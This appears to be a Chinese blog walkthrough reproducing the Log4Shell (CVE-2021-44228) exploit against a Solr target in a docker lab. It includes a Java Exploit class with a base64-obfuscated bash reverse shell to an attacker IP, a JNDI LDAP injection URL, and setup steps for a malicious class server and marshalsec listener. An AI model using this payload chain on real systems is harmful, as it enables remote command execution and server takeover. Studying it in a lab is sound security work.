Log4j2-CVE-2021-44228

  • 开发
  • 26

一、环境搭建

机器:kali Linux

Java:jdk8

python:python3.7.x

二、在docker里面搭建靶机环境

三、访问

四、构造payload

五、替换

将上面构造好的反弹shell语句替换

import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
     public Exploit(){
             try{
                 Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}");
                                }catch(Exception e){
                                            e.printStackTrace();
                                             }
                }
         public static void main(String[] argv){
                         Exploit e = new Exploit();
                            }
}​

将上面文件放进Exploit.java文件,在Windows用javac进行编译成Exploit.class,记得切换成 jdk8!

然后放进kali里面查看

六、开启恶意站点

用python在含有java.class开启http服务

访问一下,看看效果

七、用marshalsec-0.0.3-SNAPSHOT-all.jar插件开启LADP监听

八、开启监听端口

九、传入恶意参数

http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://192.168.217.128:1389/Exploit}

十、查看效果

如上图所示即反弹shell成功!​

阅读全部

相关推荐

最近更新

  4. TCP协议是安全的吗?

    2023-12-30 05:20:02       16 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-30 05:20:02       16 阅读

  13. 【Python教程】压缩PDF文件大小

    2023-12-30 05:20:02       15 阅读

  18. 通过文章id递归查询所有评论(xml)

    2023-12-30 05:20:02       18 阅读

热门阅读

  1. Oracle导出导入dmp

    2023-12-30 05:20:02       28 阅读

  3. 举例说明自然语言(NLP)技术

    2023-12-30 05:20:02       33 阅读

  5. 基于vim的开发编辑器配置

    2023-12-30 05:20:02       32 阅读

  11. 【网络基础】网络基础知识(学习笔记)

    2023-12-30 05:20:02       37 阅读

  15. 举例说明自然语言处理(NLP)技术

    2023-12-30 05:20:02       32 阅读

  19. Serverless架构学习路线及平台对比

    2023-12-30 05:20:02       34 阅读

  25. 创建第一个electron项目

    2023-12-30 05:20:02       34 阅读

  27. test ui-01-UI 测试组件之 Selenium 入门介绍

    2023-12-30 05:20:02       35 阅读